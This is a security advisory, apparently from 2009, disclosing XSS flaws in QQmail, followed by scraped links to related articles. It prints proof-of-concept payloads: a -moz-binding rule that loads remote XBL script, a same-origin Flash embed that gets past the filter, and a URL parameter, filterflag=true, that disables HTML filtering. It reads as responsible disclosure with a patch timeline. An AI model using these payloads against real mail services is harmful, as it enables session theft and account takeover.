QQmail Multiple Xss Vulnerabilities
作者: www.80vul.com
1. firefox2 css xss vulnerabilities
<style>BODY{-moz-binding:url("http://www.80vul.coom/test.xml#xss")}</style>
test.xml:
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<bindingSpellE">xss">
<implementation>
<constructor><![CDATA[alert('XSS')]]></constructor>
</implementation>
</binding>
</bindings>
[PS:firefox3开始不允许-moz-binding:url引用远程文件]
2. 设计缺陷导致的xss漏洞
A.上传文件直接导致xss漏洞
在qqmail的附件和图片上传功能上存在着设计缺陷:
* 上传文件存放域和qqmail是同一个域
* 上传的文件后缀及内容根本没有做安全限制,直接导致上传一些恶意文件导致xss[如swf文件]
B.qqmail的Filter系统是不允许引用外部文件的[src=],但是它允许本地相对路径的文件引用
例如:
<embed src="http://www.80vul.com/test.swf" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed>
会被替换为:
<embed src="#" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed>
但是它允许本地相对路径的文件引用,利用这个设计缺陷和上面A提到的”上传文件存放域和qqmail是同一个域”,综合利用导致xss漏洞
<embed src="/data/test.swf" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed>
同样的比如上面1里提到的,也可以通过这个实现对firefox3的利用.[另外flash xml等文件的调用是可以修改后缀的 J]
C.qqmail的Filter系统一个设计缺陷导致完全绕过Filter系统.
qqmail的Filter系统的设计者,可能是为了功能与安全过滤上的和谐,给用户留下了一个’开关’:当提交开关filterflag=true时, Filter系统将不在起作用:
http://m348.mail.qq.com/cgi-bin/readmail?mailid=ZC1217iK5yq~a8ToGOBNZbWCXXXw86&folderid=1&t=readmail&&&groupid=&sid=Cks1q-OzUAjlT0gB&disptype=html&dispimg=1&filterflag=true
3. 其他
2009.4.17-18发现漏洞
2009.4.18 通知腾讯安全中心
2009.5.x 修补以上漏洞
QQmail Multiple Xss Vulnerabilities相关推荐
- Using setJavaScriptEnabled can Introduce XSS Vulnerabilities into
Android Warning : Using setJavaScriptEnabled can introduce XSS vulnerabilities into you application, ...
- Using setJavaScriptEnabled can introduce XSS vulnerabilities into you application
Android Warning : Using setJavaScriptEnabled can introduce XSS vulnerabilities into you application, ...
- XSS之xssprotect
http://liuzidong.iteye.com/blog/1744023 参考资料 1 跨网站脚本http://zh.wikipedia.org/wiki/XSS 2http://code.go ...
- 2021-11-09 Cynthia XSS
There are XSS vulnerabilities when publishing articles here 1. Create a new article 2. Fill in the n ...
- Barracuda WSF v4.x - Bypass Persistent Vulnerabilities
Document Title: =============== Barracuda WSF v4.x - Bypass & Persistent VulnerabilitiesReferenc ...
- 转载:2014 Top Security Tools as Voted by ToolsWatch.org Readers
2014年十大安全工具排行榜(来自于ToolsWatch.org读者投票) 原文地址:http://www.toolswatch.org/2015/01/2014-top-security-tools ...
- vulnhub 靶机渗透:Stapler
Stapler nmap扫描 21 端口 22 53端口 80端口 目录爆破 139端口 666 端口 3306端口 12380端口 获取数据库root权限 获取系统立足点 提权 其他思路 系统立足点 ...
- sqlmap 使用方法
sqlmap 使用方法 Usage: python3 sqlmap [options] Options: -h, --help Show basic help message and exit(显示基 ...
- [zz]Freeware, Open source and Commercial Website Security Tools and Services
http://www.malwarehelp.org/freeware-open-source-commercial-website-security-tools-services-downloads ...
最新文章
- hdu 1599 find the mincost route(找无向图最小环)(floyd求最小环)
- 用 Python 详解《英雄联盟》游戏取胜的重要因素!
- Maven项目中引入spring-test单元测试 @RunWith与@ContextConfigration报错
- html 动态调用php文件,html静态页面调用php文件的方法
- 计算机考博哪个学校好考,管理学博士哪个学校好考
- 从文本分类问题中的特征词选择算法追踪如何将数学知识,数学理论迁移到实际工程中去...
- linux sed 循环多行,linux sed 多行处理详细总结
- android 捕获Home键和ACTION_TIME_TICK广播
- 勒索病毒病毒样本研究_我们能否通过快速,开放的研究来应对寨卡病毒?
- 利用Office加载项进行持久化控制的6种姿势
- D. Magic Breeding
- left join on or 优化_pandas中merge/join有什么区别?
- Codeforces Round#308
- 一条命令关掉centos所有不必要的服务和端口号
- 「代码随想录」本周小结!(动态规划系列一)
- java手机号正则验证(电信、联通、移动、香港)
- python集合的并交差操作
- 数据库系统工程师考试的考点是哪些?
- 电路功能描述方式——数据流方式
- 微型计算机基础学的什么,微型计算机操作基础课的教学